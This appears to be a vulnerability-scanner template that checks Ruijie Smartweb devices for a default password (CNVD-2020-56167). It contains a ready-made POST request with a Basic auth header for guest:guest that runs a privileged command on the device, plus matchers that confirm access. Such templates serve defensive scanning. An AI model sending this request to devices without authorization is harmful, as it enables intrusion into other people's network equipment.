id: CNVD-2020-56167 info: name: Ruijie Smartweb - Default Password author: pikpikcu severity: low description: Ruijie Smartweb contains a vulnerability via the default password. An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 - https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner tags: ruijie,default-login,cnvd,cnvd2020 http: - method: POST path: - "{{BaseURL}}/WEB_VMS/LEVEL15/" headers: Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. matchers-condition: and matchers: - type: word part: body words: - "Level was: LEVEL15" - "/WEB_VMS/LEVEL15/" condition: and - type: status status: - 200 # Enhanced by mp on 2022/09/30